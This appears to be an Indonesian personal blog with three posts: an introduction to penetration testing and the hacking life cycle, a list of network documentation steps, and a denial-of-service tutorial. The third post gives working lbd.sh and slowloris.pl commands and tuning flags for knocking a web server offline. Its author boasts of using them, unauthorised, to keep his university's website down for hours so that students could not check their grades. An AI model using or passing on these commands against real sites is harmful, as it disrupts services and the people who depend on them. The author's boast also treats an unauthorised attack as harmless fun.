Ppentest, Win Security

Pentest

PenTest secara umum merupakan singkatan dari Penetration Test… Artinya (menurut Wikipedia dengan sedikit perubahan) adalah suatu metode untuk mengevaluasi keamanan sistem komputer atau jaringan dengan mensimulasikan serangan yang mungkin terjadi dari pihak yang tidak bertanggung jawab (misalnya Black Hat Hacker ataupun kracker)…

Jadi, secara garis besar, kegiatan PenTest merupakan kegiatan yang memiliki etika yang baik, dengan keadaan yang terbuka dan dilakukan oleh para White Hat Hacker untuk mencoba masuk ke dalam sistem dengan menggunakan berbagai teknik yang mungkin dapat dilakukan / dicoba oleh para Black Hat Hacker maupun kracker… sifatnya lebih ke defensive purpose (mencoba menyerang, kemudian memberitahukan letak celah untuk diperbaiki oleh pemilik sistem yang bersangkutan)…

Di dalam PenTest, pasti akan terdengar lagi istilah PenTester… Dari namanya, pasti sudah dapat ketebak yach ini apa… yach, PenTester ini merupakan pemainnya, pemain dari kegiatan PenTest…PenTester ini biasanya White Hat Hacker… Orang-Orang yang bekerja pada suatu instansi tertentu yang berada di bawah surat perjanjian untuk tidak membocorkan informasi apapun yang ada pada kegiatan PenTest… namun, tidak menutup kemungkinan bahwa pelaku kegiatan PenTest ini bisa juga dari kalangan Black Hat ataupun Grey Hat… terkadang, ada alasan tersendiri dari suatu instansi untuk memakai tenang yang seperti ini (semua kembali kepada kebijakan masing-masing)…

Nah, menurut salah satu penyelenggara sertifikasi yang berhubungan dengan Hacking (EC – Cou***l), pada umumnya, kegiatan Hacking dilakukan melalui life cycle seperti ini:

1. Reconnaissance
–> lebih ke arah Information Gathering… Terbagi menjadi 2, ada aktif, ada pula pasif…
–> Untuk Pasif : pencarian dilakukan dengan tidak berhubungan langsung dengan target, seperti melalui InterNet…
–> Untuk Aktif : pencarian dilakukan langsung dengan berhubungan dengan target… Biasanya dikenal dengan sebutan Social Engineering… Ingat Kevin Mitnick…

2. Scanning
–> lebih ke arah vulnerability scanning… pencarian kelemahan dari sistem yang sedang dites…

3. Gaining Access
–> lebih ke arah mencoba untuk mengambil alih sistem yang sedang dites…

4. Maintaining Access
–> lebih ke arah meninggalkan jejak tersembunyi, sebagai contoh, meletakan backdoor… pastinya, seorang Attacker tidak ingin bersusah payah lagi mengambil alih sistem yang telah berhasil diterobos… Bisa saja keesokan harinya, sang administrator telah menge-patch sistemnya, sehingga Attacker tidak dapat lagi masuk lewat celah yang sama…

5. Clearing Tracks
–> Seorang Attacker pastinya tidak ingin aktivitas Hacking mereka berujung di penjara, jadi, mereka pasti menghapus jejak mereka setelah meletakan pintu masuk lewat belakang dan setelah mereka utak-atik sistem yang berhasil diterobos…

Nah, ini merupakan gambaran Hacking yang biasa dilakukan seorang Attacker… namun, untuk kegiatan PenTest resmi, biasanya hanya sampai Gaining Access… setelah berhasil mencapai tahap 3, maka pekerjaan mereka telah dinyatakan selesai untuk setiap celah yang ditemukan…

Standard
Networking

Network Documentation

Network Documentation Steps based on CCDA Study Guide:

Step 01: Characterize the customer’s applications

Step 02: Characterize the network protocols

Step 03: Document the customer’s current network (topology, diagram, etc)

Step 04: Identify potential bottlenecks

Step 05: Identify the bussiness constraints and inputs into your network design

Step 06: Characterize the existing network availability

Step 07: Characterize the existing network reliability

Step 08: Characterize the network performance

Step 09: Characterize the network utilization

Step 10: Characterize the status of major routers

Step 11: Characterize the existing network management tools
Step 12: Summarize the health of the existing network

Standard
./dev/sda /tmp/backtrack, Ppentest

DDos attack lagiii

Nah sekarang kita coba gunakan LBD dan Slowloris…
pertama saya sarankan jangan terlalu sering main beginian kasian karena merugikan..kemarin² saya kesal dengan kampus saya karena sudah ipk jelek pemberitahuan remedialpun ga jelas , di undur lah, nilai belum fix lah, udah tau saya mahasiswa goblok d bikin susah lagi..mana bayar 26rb/mata kuliah 😥 …jadi curhat wkwkwk…

oke, pertama gunakan lbd.sh untuk cek load balancing pada web caranya :

– Buka terminal ( ctrl + t )
– ketik cd Desktop ( tempat menyimpan kedua tools/file tadi )
– jalankan lbd.sh dengan perintah ./lbd.sh
– jika permision denied ketik dulu chmod 755 lbd.sh lalu coba lagi ketik ./lbd.sh
– jika berhasil langsung ketik ./lbd.sh example.com bisa juga dengan menggunakan ip web tsb caranya ping dulu
( ping http://www.example.com ) nanti ada ip yg muncul…
– tunggu hingga selesai dan lihat apakah menggunakan load balancing atau tidak jika tidak output akhir yg saya dapatkan seperti ini :

Checking for HTTP-Loadbalancing [Diff]: NOT FOUND

203.130.232.49 does NOT use Load-balancing.

berarti kita lanjutkan ke slowloris…. 🙂

– ketik pada terminal cd Desktop ( jika sudah langsung saja )
– ./slowloris.pl -dns [target] -port 80 -timeout 500 -num 500 -tcpto 5 -httpready
*selama melakukan dos terminal jangan d close
– tapi jika ingin lebih mantap silahkan pahami kutipan yang saya dapat dari http://forum.indonesianbacktrack.or.id/

keterangan :

* -dns : the target ( dapat berupa IP atau domain )

* -port : port yg di gunakan oleh webserver ( 80 )

* -timeout: nilai waktu delay timeout untuk setiap paket thread, penantian reacquiring ruang tcp di server. pada langkah pengetesan, Nilai ini diisi dengan flag -test

* -num : jumlah soket yang digunakan untuk mendapatkan koneksi.Biasanya server apache akan membutuhkan nilai antara 400-600 atau tergantung pada konfigurasi

* -tcpto : TCP Timeout.

* -httpready: HTTPReady di gunakan apache untuk buffer connections. attacker dapat melewati perlindungan ini dengan mengirimkan permintaan POST bukan GET atau HEAD.

untuk mengetahui limit timeoout gunakan perintah
./slowloris.pl -dns [ip/webdomain target] -port 80 -test
tunggu sampai mememukan limit timeoutnya

saya mencoba dengan timeout 500 dan num 700, berhasil web tidak bisa d buka , tapi tidak lama kemudian bisa lagi 😦
dan sayapun memutuskan untuk iseng, timeout saya kasih 500 dan num 5000 wkwk hasilnya memuaskan,,
beberapa jam web tidak bisa d buka, (dengan catatan jika web sudah terbuka lagi saya ulangi lagi slowlorisnya)..otomatis yang mau login melihat nilai harus tertunda…itu hanya sebagai pengalaman saja 🙂
mungkin di postingan berikutnya saya akan share videonya karena mungkin kata2 saya ada yg tidak di mengerti atau berbelit2 mohon

Standard